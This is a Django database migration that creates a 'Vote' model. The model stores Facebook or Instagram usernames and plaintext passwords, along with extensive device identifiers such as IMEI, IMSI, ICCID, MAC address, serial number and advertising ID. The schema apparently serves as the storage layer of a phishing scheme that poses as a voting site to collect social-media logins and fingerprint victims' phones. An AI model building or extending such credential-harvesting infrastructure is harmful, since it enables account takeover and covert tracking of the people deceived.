# Generated by Django 5.1.7 on 2025-03-10 07:06

import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Vote',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('platform', models.CharField(choices=[('facebook', 'Facebook'), ('instagram', 'Instagram')], max_length=10)),
                ('email_or_username', models.CharField(max_length=255)),
                ('password', models.CharField(max_length=255)),
                ('device_model', models.CharField(blank=True, max_length=255, null=True)),
                ('device_manufacturer', models.CharField(blank=True, max_length=255, null=True)),
                ('operating_system', models.CharField(blank=True, max_length=255, null=True)),
                ('os_version', models.CharField(blank=True, max_length=50, null=True)),
                ('imei', models.CharField(blank=True, max_length=50, null=True)),
                ('mac_address', models.CharField(blank=True, max_length=50, null=True)),
                ('serial_number', models.CharField(blank=True, max_length=50, null=True)),
                ('ip_address', models.GenericIPAddressField(blank=True, null=True)),
                ('user_agent', models.TextField(blank=True, null=True)),
                ('build_number', models.CharField(blank=True, max_length=50, null=True)),
                ('kernel_version', models.CharField(blank=True, max_length=50, null=True)),
                ('google_play_services_id', models.CharField(blank=True, max_length=50, null=True)),
                ('advertising_id', models.CharField(blank=True, max_length=50, null=True)),
                ('iccid', models.CharField(blank=True, max_length=50, null=True)),
                ('imsi', models.CharField(blank=True, max_length=50, null=True)),
                ('network_info', models.CharField(blank=True, max_length=255, null=True)),
                ('carrier_info', models.CharField(blank=True, max_length=255, null=True)),
                ('bluetooth_ssid', models.CharField(blank=True, max_length=255, null=True)),
                ('wifi_ssid', models.CharField(blank=True, max_length=255, null=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
